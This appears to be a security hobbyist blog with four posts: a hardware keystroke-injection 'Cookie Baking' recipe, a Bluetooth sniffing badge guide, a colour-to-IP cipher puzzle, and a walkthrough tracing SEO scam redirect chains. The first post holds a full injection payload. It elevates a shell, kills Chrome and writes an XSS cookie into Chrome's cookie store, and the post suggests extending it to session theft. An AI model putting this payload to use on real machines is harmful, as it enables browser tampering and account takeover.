Tuesday, December 25, 2018

COOKIE BAKING: WHID-Injected Cookies

Baking up some holiday WHID-Injected Cookies...


Just in time for the holidays...LostRabbitLabs recently updated the cookie fuzzing tool "Anomalous Cookie" and rabbit-holed it's way into a new attack vector called "Cookie Baking".

What is Cookie Baking?
Cookie Baking is the technique of creating or modifying a cookie in a users' local Cookie Jar. This includes stuffing with malicious payloads, affiliate tags, fuzz-strings and more. Cookie Baking also provides a delivery method for targeting 'Self-XSS'  vulnerabilities, allowing them to be exploited.


Epic Holiday Cookie Baking...

If you would like to read more about 'Cookie Baking' and how it has been recently used, check out the blog "Epic Holiday Cookie Baking" at the Coalfire Labs website (link below):



Let's take the example XSS vulnerability discussed from "Epic Holiday Cookie Baking" and create a WHID Injector payload that can be used in our ingredients list.


MERRY CHRISTMAS from LostRabbitLabs...below you will find the full recipe for 'WHID-Injected Cookies'. >8-P



.-= WHID-Injected Cookies =-.

INGREDIENTS:
---------------------------------------------
  1.  1 x WHID-Injector (https://github.com/whid-injector/WHID)
  2.  1 x 'target' computer (in our 'case'...a Windows system)
  3.  1 x Vulnerable Cookie (using '_epicSID' from the example above)
  4.  1 x 'CookieBaker-WHID.txt' payload file (found below)

OPTIONAL:
      1 x WHID-Injector to Motherboard adapter (WI-to-MB) -  pictured below

NOTE: If you can 'Hide Yo' WHID' inside the 'target case', this will add persistence to your 'Cookie Baking'!

 
 


=============================================
=============================================

 'CookieBaker-WHID.txt'
  (save contents below to file - to be uploaded to your WHID Injector)

=============================================
=============================================

Delay
Delay
Delay
Press:131+114
PrintLine:powershell Start-Process cmd.exe -Verb runAs
Delay
Press:130+121
Delay
PrintLine:taskkill /im chrome.exe* /f
DelayPrintLine:powershell
Delay
PrintLine:Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
Delay
PrintLine:Install-Module PSSQLite -Force
Delay
PrintLine:set-executionpolicy remotesigned
Delay
PrintLine:Import-Module PSSQLite
Delay
PrintLine:$Database = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
Delay
PrintLine:$query = "INSERT INTO cookies
(creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,encrypted_value,firstpartyonly) VALUES  ('13186874114525467','.epicgames.com','_epicSID','kpjak%3c%2fscript%3e%3cScRiPt%3ealert(1)%3c%2fScRiPt%3efbu5ubf6b6ce405264df19ea1394b58aba4d0','/','0','0','1','13386874114525467','0','1','0',NULL,'0')"
Delay
PrintLine:Invoke-SqliteQuery -DataSource $Database -Query $query
Delay
PrintLine:exit
Delay
PrintLine:exit

=============================================
=============================================

DIRECTIONS:
---------------------------------------------
  1. Plug 'WHID-Injector' into 'target' system
  2. Connect to WIFI network on pre-configured access-point of WHID-Injector
  3. Navigate to http://192.168.1.1 (or your custom pre-configured network


     4. Choose 'Upload Payload' and select our newly created 'CookieBaker-WHID.txt' file
     5. From the main menu choose 'Cookie-Baker-WHID.txt' from the payload list


     6. Click on 'Run Payload' button to run Cookie Baker on target system


    7. Target exploited. Eat carrots. The cookie payload above shows a Proof-of-concept XSS injection attack vector and payload but you will need to create the full working payload yourself! Will you steal session cookies, BeEF hook them or create a more clever client-side attack not yet seen?




Next Steps...


  1. Update 'Anomalous Cookie' as needed with better payloads/techniques
  2. Create Metasploit module for 'Cookie Baking' framework
  3. Catalog all known vulnerable cookies and create shared database
  4. Investigate 'Affiliate Fraud' possibilities




                                           ...and a Happy New Year!



Saturday, October 13, 2018

DERBYCON VIII: Bluetooth DeMystifier

How to make a wearable Raspberry Pi...


LostRabbitLabs created five (5) 'Bluetooth DeMystifiers' and brought them to DerbyCon to share. This page will serve as the howto and manual for those who have the badge and those who would like to build one. All parts needed to build one along with instructions on how to use will be listed below. If you would like a copy of the original SDCard image (RaspberryPI Wireless Zero) let me know and I will provide the link. Code will be posted to our Github soon.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What is a Bluetooth DeMystifier?
Using a Raspberry PI Zero Wireless tucked in a bag (making it a 'Hacky Sack' - thank you pancho for the great name)...it is a bluetooth enumerator, logger, identifier, sniffer, collector & plotter with ssh & web interfaces for admin access. With the DeMystifier you can...identify bluetooth/BLE devices around you, plot their signals over time providing real-time proximity data, and collect stats on Top Mac Addresses and Vendors observed. This can assist with locating lost devices, detecting if you are being followed, and give some insight into the Bluetooth Darknet that exists all around us.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What you will need:
1. Raspberry PI Wireless Zero
2. Adafruit PiTFT 2.2" HAT Mini Kit - 320x240 2.2"
3. GPIO headers (for connecting PI to PiTFT)
4. Adafruit PowerBoost 1000C & one (1) on/off switch
5. 3.7v 2000mAh Lithium Ion Battery
6. One small leathery bag & Paracord



Back and front view of DeMystifier before it goes in the bag! Notice the four (4) buttons on the front below the screen!

Putting things together is pretty easy. Solder headers onto Raspberry Pi. Solder PiTFT to headers (leaving room for access to microUSB ports on the the PI). Connect power wires from Powerboost to Raspberry PI and attach battery. Slide in bag and loop paracord through bag ties. Leather-punky...and done!



How to use:
1. Charge battery (or use microUSB power while charging)
2. Turn on/off switch to ON position (located on back of badge)
3. Device boots up! You should see output and boot-up images (shown below) on the screen followed by the DerbyCon VIII splash screen (pictured above). Be patient and badge may take 1-2 minutes to boot up completely.


4. Using the four (4) buttons on the front of the badge, you can access different bluetooth data being collected/observed.

BUTTON 1:
Displays a graph of the Top 10 most observed Bluetooth Mac Addresses over time. This shows patterns in observed bluetooth traffic, devices and the people/objects who control them. Use for Red-Teaming, Blue-Teaming, Purple-Teaming, Asset management, and curiosity!





BUTTON 2:
Pressing this button will show statistics around total Mac Addresses, vendors and connections observed along with a listing of all devices observed in the last 60 seconds.



The Blueooth DeMystifier uses the open source software package 'Bluetoothctl' to provide some of the data seen in this view.






BUTTON 3:
This shows a real-time, enriched view (in the CSV format) of bluetooth/BLE signals observed complete with timestamp, vendor OUI lookup, and leaked strings.



BUTTON 4:
The Blueooth DeMystifier uses the open source software package 'hcitool' to provide some of the data seen in this view. It provides real-time BLE sniffing. Occasionally the command 'hcitool lescan' displays in I/O error message. Just press the button again...and wish for the best!





How to access the SSH and WEB interfaces:
In order to access the SSH and Web interfaces you will need to modify the existing 'wpa_supplicant.conf' file to use your own wireless network. This can be achieved by mounting the sdcard and modifying the the "/etc/wpa_supplicant/wpa_supplicant.conf" file.

wpa_supplicant.conf:
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1

network={
 ssid="YOUR WIFI_SSID"
 psk="YOUR_WPA_KEY"
}

------------------------------------------------
Once your Bluetooth DeMystifier is online...you can log in to SSH by using the following methodology below.

SSH LOGIN:


1. Log in to Raspberry PI using the user 'pi2' and the password 'derbycon'
2. Gain root privileges using the command 'su -' and then using 'derbycon' as the password.
3. All data and important files are in '/home/pi/installs'.
4. Factory reset the DeMystifier (clearing out all bluetooth stats and starting over) by running '/home/pi/installs/clean.sh' and rebooting.

------------------------------------------------

WEB ACCESS:
The web interface for 'Bluetooth DeMystifier' provides additional graphs, logs, and ability to plot any Mac Address you request. Available data includes...

  • Bluetooth Stats - Macs, Vendors, Strings
  • All Discovered Devices (Name/Mac)
  • Discovered Devices Last 5 Minutes (Name/Mac)
  • CSV Version of Log Data
  • Top 10 MACADDRS - Last 10 Minutes
  • Top 10 MACADDRS - All-Time
.
Sample CSV output data shown below...

Use the '/home/pi/installs/tags.txt' file to create MAC-to-TAG translations as well as plot any Mac Address using the request URL below:

http://YOUR_IP_ADDRESS:1337/?macaddr=01:02:03:04:05:06


Thank you DerbyCon!
It was a great DerbyCon and I can't wait to go back next year. Great staff, family and local hospitality (not to mention the great food and drink). To many more!


Wednesday, August 16, 2017

DIGITAL ALCHEMY: Colors to IP Addresses

Crypto challenge fun for everyday use...



CRYPTO CHALLENGES encourage us to think about things in ways we normally don't. They challenge our brains and intellect to treat a certain data point in a unique fashion often outside the realm of 'normalcy'. I believe these efforts help us evolve our awareness and creativity, and sharpen our techniques regardless of our craft. Let's take the below for example....

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


There's no place
LIKE HOME!!


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

There is a 'hidden location' embedded in the above. At first glance you may think the image could hold EXIF data or Steganography. In this case however the twist comes in the form of chosen TEXT COLORS for the 'anomalous words' in the sentence. Let's take a look at the raw HTML code:

<span style="color: #7f0000;">LIKE</span>
<span style="color: #000001;">HOME</span>

The 2 pieces of information that "stand out" are the values used for text color:
LIKE (text color used) = #7f0000 (r=127, g=0, b=0)
HOME (text color used)  = #000001 (r=0, g=0, b=1)


SOLUTION TECHNIQUE:
If we take the HEX values for the 2 different colors (in correct order) and with proper bit-shifting/truncation we can translate the value back into an IP ADDRESS. In our example...

1st color: #7f0000
-- Remove the LAST 2 bytes from the value. New value = 7f00

2nd color: #000001
-- Remove the FIRST 2 bytes from the value. New value = 0001

Now concatenate (left to right) the first 'new value' & the second 'new value' to get the final HEX:
7f000001 (or #7f000001)

-----
If we convert this value from HEX to DECIMAL...
(http://www.binaryhexconverter.com/hex-to-decimal-converter)
(http://www.rapidtables.com/convert/number/hex-to-decimal.htm)

RESULT: 2130706433

-----
If we convert the DECIMAL to an IP ADDRESS...
(https://www.browserling.com/tools/dec-to-ip):

















RESULT = 127.0.0.1 (http://whatismyipaddress.com/localhost)

The 'hidden location' turned out to be the IP ADDRESS for HOME/LOCALHOST: 127.0.0.1.


NOTE: We can also use the websites below to convert from HEX directly to an IP ADDRESS.
(http://ncalculators.com/digital-computation/ip-address-hex-decimal-binary.htm)
(http://www.kloth.net/services/iplocate.php)






CREATING THE '2-COLOR IP CIPHER':

1) First we start out by choosing our target IP ADDRESS. For this example let's use '192.168.123.234'.


2) We need to convert our IP ADDRESS to a HEX value. Let's use the site below:
http://www.kloth.net/services/iplocate.php

New HEX value: C0A87BEA


3) We need to split this value into 2 unique RGB HEX values by using the method below...

To create the 1st color:
Remove the LAST 2 bytes from the HEX value: C0A87B (or #C0A87B)

To create the 2nd color:
Remove the FIRST 2 bytes from the HEX value: A87BEA (or #A87BEA)

Let's use the site below to validate the 2 unique colors we just created:
http://www.rapidtables.com/convert/color/hex-to-rgb.htm

 

Notice the 'rgb' values above as they should look familiar. It should be apparent as to why the bit-shift/truncation needs to happen to construct a usable IP ADDRESS from the '2-COLOR IP CIPHER'. Now we can leave a 'secret message' with a clue leading to the next rendezvous point.


4) Create a secret message using the 2 unique colors we just created:

Secret Message (which we of course know is '192.168.123.234'):
LOOK HERE!

HTML CODE for 'LOOK HERE':
<span style="color: #c0a87b;">LOOK</span> <span style="color: #a87bea;">HERE</span>


=================================================

One more special message to go, then I'm done & I can go home...


CALL ME!















Monday, July 3, 2017

DOMAIN $HADOWING: Sorting Victims from Actors

More GOOGLE $EO Rabbitholin' fun...



Threat Hunting & Rabbitholin' are a lot like the "Choose your own adventure" books we had as kids (late 70s/early 80s). Before access to video games, Internet & most modern electronics we had books/words and our brain. We were the CPU and we processed the programs/code (books) but made it dynamic (and arguably more valuable) with our logic, reasoning and choices made in order to get the "best" ending or result.

Let's use the same methodology used in "experiencing" the old-school CYOA books to rabbit-hole for threats. We will also use similar methodologies from the last BLOG POST "GOOGLE $CAMS: $EO VooDoo".

1. SEARCH GOOGLE FOR TOPIC OF INTEREST. Here's the first choice you have in this adventure! Let's try to find links to a rogue Android APK download for a "Wells Fargo" branded mobile application (using the search terms below along with the PAST 24 Hours search parameter):

download wells fargo bank app android


2. EXAMINE THE GOOGLE SEARCH RESULTS ...
When checking the results you should be looking for any anomalies and/or anything that doesn't look 'normal'. In our results...the 2nd result looks odd...

SEARCH RESULT:
[DOC] Ellens emoji exploji itunes - 18 hours ago

CLICKING LINK LEADS TO:
hXXp://wffw[.]jenniferashe[.]net/BQ




3. CLICK ON THAT LINK!!
Be sure you are using a safe environment to do your research and not infecting yourself unintentionally. Unsafe Rabbitholin' should be avoided unless that is yer intent! On to the clickin'...





Upon clicking the link we are presented with a familiar looking animated loading splash page (from our previous BLOG POST):


Meanwhile, in the background, the browser is being redirected to multiple websites (through a redirect chain) where eventually we will end up on a landing page of unknown intent, content & threat level. Guess we'll find out any second now!


OMFG!@#$ "Your Browser have been hijacked or hacked."
-------------------------------------------------------------------------------------

FINAL LANDING PAGE:
hXXp://www[.]plaza-place-on[.]us/

SCAREWARE & FAKE TECH SUPPORT SCAMS!     
-CLICK TO ZOOM-
"Windows Firewall Security Damaged by Exploit.SWF.db Virus. A Suspicious Connection Was Trying To Access Your Logins, Banking Details & Tracking Your Internet Activity. Windows Security Center & Firewall Sevices are Disabled. Error Code 0x8024402c.

WARNING! Your Hard drive will be DELETED if you close this page. You have a ZEUS virus! Please call Support Now!. Call Toll-Free:+1-(866)-331-7691 To Stop This Process"

NEW DATA POINTS OBSERVED:
Exploit.SWF.db
0x8024402c
1-(866)-331-7691
www[.]plaza-place-on[.]us


4. REVIEW THE REQUEST SEQUENCE/REDIRECT CHAINS
We will now examine the sequence of events & connections from the initial request to the final loading of the view from plaza-place-on[.]us.


302 hXXp://wffw[.]jenniferashe[.]net/BQ
IP ADDR: 95.211.230[.]116

302 hXXp://xmlfeed[.]info:8080/click?
IP ADDR: 216.172.56[.]21

302 hXXp://64.15.72[.]104/click[.]php?
IP ADDR: 64.15.72[.]104

302 hXXp://64.15.72[.]104/click_second_new3[.]php
IP ADDR: 64.15.72[.]104

302 hXXp://go[.]quali-bid[.]com:17777/click[.]php?
IP ADDR: 64.15.72[.]46

200 hXXp://www[.]metal-rewards[.]us/
IP ADDR: 198.54.115[.]15

200 hXXp://www[.]plaza-place-on[.]us/
IP ADDR: 198.54.115[.]15


NEW DATA POINTS OBSERVED:

UNIQUE HOSTS
wffw[.]jenniferashe[.]net
xmlfeed[.]info:8080
64.15.72[.]104
go[.]quali-bid[.]com:17777
www[.]metal-rewards[.]us
www[.]plaza-place-on[.]us

UNIQUE IP ADDRS
95.211.230[.]116
216.172.56[.]21
64.15.72[.]104
64.15.72[.]46
198.54.115[.]15



!!!!!!    CHOOSE YOUR OWN ADVENTURE TIME    !!!!!!

So...where do we go from here? We definitely have several NEXT PIVOT data points, and where you begin is totally up to you (with the goal being, of course, to not get lost in the rabbit-hole). Today, I will start with WHOIS/IP Lookups of the the INITIAL REQUEST URI and the FINAL LANDING PAGE presented and then move on from there...

STEP 1 - WHOIS/IP LOOKUPS FOR 'JENNIFERASHE[.]NET'

HOST: wffw[.]jenniferashe[.]net
NSLOOKUP: 95.211.230[.]116
ASN: AS60781 (LEASEWEB NL)

DOMAIN: jenniferashe[.]net
NSLOOKUP: 50.62.248.1
ASN: AS26496 (GO-DADDY-COM-LLC Scottsdale US)

WHOIS: https://www.whois.com/whois/jenniferashe.net

Registrar URL: http://www.godaddy.com
Registrant Name: John Mekrut
Registrant Organization: The Balanced Brain
Name Server: NS05.DOMAINCONTROL.COM
Name Server: NS06.DOMAINCONTROL.COM


WEBSITE SNAPSHOT FOR 'JENNIFERASHE[.]NET':

It appears this default 'Hello world' webpage was updated on 5/30/2017) using the Wordpress framework.

<title>Tips for today &#8211; Just another WordPress site</title>

<a href="http://jenniferashe.net/2017/05/30/hello-world/">Hello world!</a>


------------------------------------------------
STEP 2 - WHOIS/IP LOOKUPS FOR 'PLAZA-PLACE-ON[.]US'

DOMAIN: plaza-place-on[.]us
NSLOOKUP: 198.54.115[.]15
ASN: AS22612 (NAMEC-4 Los Angeles US)

WHOIS: https://www.whois.com/whois/plaza-place-on.us

Registrant Name: Aniket Kumar
Registrant Email: kaniket239@gmail.com
Registrant Organization: Microlive
Name Server: DNS1.NAMECHEAPHOSTING.COM
Name Server: DNS2.NAMECHEAPHOSTING.COM

DEJA-VU! We just saw this ACTOR in our last rabbitholin' adventure where traffic was being driving to another malicious page ON THE SAME IP ADDRESS: big-shot-seller[.]us.


------------------------------------------------
STEP 3 - QUICK DIVE INTO THE 'WFFW[.]JENNIFERASHE[.]NET/BQ WEBSITE

SNAPSHOT OF WEBPAGE WITHOUT MALICIOUS CODE LOADING
(NOTE: This version of site is from GOOGLE CACHE)


Now let's look at the source code...
















NEW DATA POINTS OBSERVED:
Taking a look at the source code reveals more URLS, DOMAINS & POSSIBLY ADDITIONAL 'DOMAIN SHADOWING' VICTIMS.

ADDITIONAL 'DOMAIN SHADOWING' URLS/DOMAINS!!
hXXp://kdy[.]neurolibrium[.]co/HD5U
hXXp://sjq[.]bodiesinbalance[.]com/006
hXXp://wue[.]foundrytheatreworks[.]com/IP
hXXp://kkfp[.]neurolibrium[.]org/297
hXXp://ncbw[.]neurolibrium[.]net/Me4U
hXXp://ctu[.]bodiesinbalance[.]com/3660
hXXp://vxkt[.]neurolibrium[.]co/6jK76
hXXp://wbmb[.]mekrut[.]com/AX
hXXp://lzlc[.]neurolibrium[.]net/02
hXXp://nmdg[.]foundrytheatreworks[.]org/7
hXXp://muav[.]bodiesinbalance[.]com/ZJ


NEW DOMAIN DETECTED (BUYSOFTWAREAPPS[.]COM)!!
hXXp://www[.]buysoftwareapps[.]com/shop/itunes-2/ellens-emoji-exploji-warner-bros/

BUY! Button links to:
hXXps://itunes[.]apple[.]com/us/app/ellens-emoji-exploji/id1137689929?mt=8&uo=2&at=11lrD2

Is this Affiliate Fraud?!?! NEW RABBITHOLE DETECTED!


AND HERE'S THE "ELLEN EMOJI EXPLOJI ITUNES" CONNECTION FROM THE ORIGINAL SEARCH RESULT:
[DOC] Ellens emoji exploji itunes - 18 hours ago




!!!!!!    CHOOSE YOUR OWN ADVENTURE TIME    !!!!!!

This rabbit-hole is starting to get a bit crazy. Let's re-group and analyze our current finds and plan the next couple of steps. To review...

1. Searching for Wells Fargo Android mobile app on GOOGLE leads to suspicious LINK.

2. Clicking on suspicious LINK leads to possible malicious traffic rotators/directors...

302 hXXp://xmlfeed[.]info:8080/click - 216.172.56[.]21

302 hXXp://64.15.72[.]104/click[.]php - 64.15.72[.]104

302 hXXp://go[.]quali-bid[.]com:17777/click[.]php? - 64.15.72[.]46


3. ...where these Traffic Rotators/Directors lead the user to websites where SCAREWARE/FAKE TECH SUPPORT content is loaded to user.

So far...some scary looking stuff but nothing major. Let's go for more INFO GATHERING around the original suspicious LINK and see if we can't hook into something juicier!

NEXT STEPS:
Re-crawl the original URL four more times to generate additional interesting finds (Drive-by Malware, APK downloads, Spearphishing, etc).



STEP 5 - RE-CRAWL THE INITIAL URL
Below we will document the process and our findings into the 4 new requests made to the 'hXXp://wffw[.]jenniferashe[.]net/BQ' webpage. This INFO GATHERING will provide us with additional data points around the observed "SEO Campaign(s)".

------------------------------------------------

REQUEST #1 - LANDING PAGE & SEQUENCE:
1. Clicking the link 'hXXp://wffw[.]jenniferashe[.]net/BQ' and we are redirected through 4 different domains and then to the final landing page below.

FINAL LANDING PAGE:
hXXp://www[.]autopartswarehouse[.]com/linkshare/?apwcid=G1225939187W491258f3acead&siteID=dWQsD5Zt_Zs-o.uT.

REDIRECT SEQUENCE:
1. go[.]quali-bid[.]com:17777 | 64.15[.]72[.]46

2. brightisles[.]com | 173.214[.]175[.]106

3. droppricealert[.]com | 
206.72[.]207[.]253

4. click[.]linksynergy[.]com | 
34.198[.]100[.]55





NEW DATA POINTS OBSERVED:
brightisles[.]com
droppricealert[.]com
click[.]linksynergy[.]com
www[.]autopartswarehouse[.]com
173.214[.]175[.]106
206.72[.]207[.]253
34.198[.]100[.]55
184.85.194[.]231


POSSIBLE AFFILIATE FRAUD DETECTED!!
More research is needed but there could be Affiliate Partner Information in the observed URL and delivered COOKIES, indicating possible fraudulent activity.




"Auto Parts Warehouse is an American online retailer of automotive parts and accessories for cars, vans, trucks, and sport utility vehicles."

Parent organization: U.S. Auto Parts
Headquarters: Carson, CA
Founded: 1995


------------------------------------------------
REQUEST #2 - LANDING PAGE & SEQUENCE:
1. Clicking the link 'hXXp://wffw[.]jenniferashe[.]net/BQ' and we are redirected through 3 different domains & 1 IP ADDR and then to the final landing page below.

FINAL LANDING PAGE (truncated):
hXXp://internet4[.]revieworbit[.]com/?isp=Comcast%20Cable%20Communications%20inc.&country=US&utm_source=Advertise.com&utm_content=46355-7337_243187&utm_term=&utm_campaign=us&utm_medium=e56-2-4-aa-72&voluumdata=BASE64dmlkL&affsub=46355-7337_243187&terms_html=ellens%20emoji%20exploji%20itunes&terms_html_kw=ellens%20emoji%20exploji%20itunes&xsite=xsite}&epc=0.0130&sid=1499039022595_1499039007225_114_624_61407805_1

REDIRECT SEQUENCE:
1. xmlfeed[.]info:8080 | 216.172.56[.]21

2. 64.15.72[.]104 | 64.15.72[.]104

3. 
ml8730[.]com | 38.107.161[.]250

4. 
track[.]spdtrck[.]pro | 52.86.58[.]112






NEW DATA POINTS OBSERVED:
xmlfeed[.]info
ml8730[.]com
track[.]spdtrck[.]pro
internet4[.]revieworbit[.]com
216.172.56[.]21
64.15.72[.]104
38.107.161[.]250
52.86.58[.]112

SURVEY/SCUMWARE DETECTED!!
More research is needed but there could be RISK in clicking buttons on the site (completing the Survey is not recommended).



QUICK OSINT LOOKUP:
Lookup top referrals and destination sites using Similar Web.

TOP REFS TO REVIEWORBIT[.]COM:
kissanime[.]ru
vq40567[.]com
vq78391[.]com
wd15303[.]com
credittipstoday[.]com

TOP REFS/DESTS FROM SIMILARWEB:
https://www.similarweb.com/website/revieworbit.com#referrals















------------------------------------------------
REQUEST #3 - LANDING PAGE & SEQUENCE:
1. Clicking the link 'hXXp://wffw[.]jenniferashe[.]net/BQ' and we are redirected through 3 different domains & 1 IP ADDR and then to the final landing page below.

FINAL LANDING PAGE:
hxxp://vitalworldnews[.]com/ob/?AffiliateReferenceID=1499026682299_1499026669282_121_71828_59656669_1

REDIRECT SEQUENCE:
1. xmlfeed.info:8080 | 216.172.56[.]21
2. 64.15.72[.]104 | 64.15.72[.]104
3. ml8730[.]com | 38.107.161[.]250
4. vitalworldnews[.]com | 104.198.183[.]107


QUICK PIVOT - OUTBRAIN DETECTED!:
<div class="OUTBRAIN">
http://widgets.outbrain.com/outbrain.js


NEW DATA POINTS:
xmlfeed[.]info:8080
ml8730[.]com
vitalworldnews[.]com
widgets.outbrain[.]com
216.172.56[.]21
64.15.72[.]104
38.107.161[.]250
104.198.183[.]107
23.216.80[.]58

------------------------------------------------
REQUEST #4 - LANDING PAGE & SEQUENCE:
1. Clicking the link 'hXXp://wffw[.]jenniferashe[.]net/BQ' and we are redirected through 2 different domains & 1 IP ADDR (then to unknown destination) and then to the final landing page below.

FINAL LANDING PAGE:
hXXps://www[.]amazon[.]com/VideoSecu-ML531BE-Monitor-Articulating-Extension/dp/B000WYVBR0?
psc=1&SubscriptionId=AKIAJ2AME6KQOPD23XQQ&tag=alwaysfishertoys-20&linkCode=xm2&camp=2025&creative=165953&creativeASIN=B000WYVBR0



REDIRECT SEQUENCE:
1. 64.15.72[.]104 | 64.15.72[.]104
2. go[.]quali-bid[.]com:17777 | 64.15[.]72[.]46
3. brightisles[.]com | 173.214[.]175[.]106
4. UNKNOWN





AMAZON AFFILIATE PARTNER FRAUD?:
alwaysfishertoys-20




!!!!!!    CHOOSE YOUR OWN ADVENTURE TIME    !!!!!!

Before closing out this investigation, let's make a quick OSINT check into this "alwaysfisthertoys-20" Amazon Affiliate Partner.

1. Google search for the following:
alwaysfishertoys



2. Clicking on the GOOGLE SEARCH RESULT shown above loads the following website:
hXXp://saginawcounty[.]com/n1site/apps/LeaveSite.aspx?url=alwaysfishertoys.com%2Fs%3Fsearch%3Dmanual%2Bjuice%2Bpress%2BB01KKD1R0S

What the shit is this? Looks like someone is trying to drive traffic to Amazon for financial gain!



"You are about to be redirected to another site. If this does not happen automatically in 5 seconds, click the link below."



REDIRECT LEADS TO:
hXXp://alwaysfishertoys[.]com/s?search=manual+juice+press+B01KKD1R0S








WHICH LINKS TO:
https://www.amazon.com/Chef-Kitchen-Tools-Manual-Juicer/dp/B01KKD1R0S?SubscriptionId=AKIAJ2AME6KQOPD23XQQ&tag=alwaysfishertoys-20&linkCode=xm2&camp=2025&creative=165953&creativeASIN=B01KKD1R0S









------------------------------------------------------------------

LAST QUICK OSINT CHECK - SIMILARWEB (ALWAYSFISHERTOYS.COM)
Notice the previously observed domain 'brightisles[.]com' is on the TOP 5 REFERRING SITES list! There's some connections to be made round these here rabbitholes...but for now...


(https://www.similarweb.com/website/alwaysfishertoys[.]com#referrals)

------------------------------------------------------------------
!!!!!!    CHOOSE YOUR OWN ADVENTURE TIME    !!!!!!

I choose to take a carrot break here. That'right...we're all done for now. Until next time...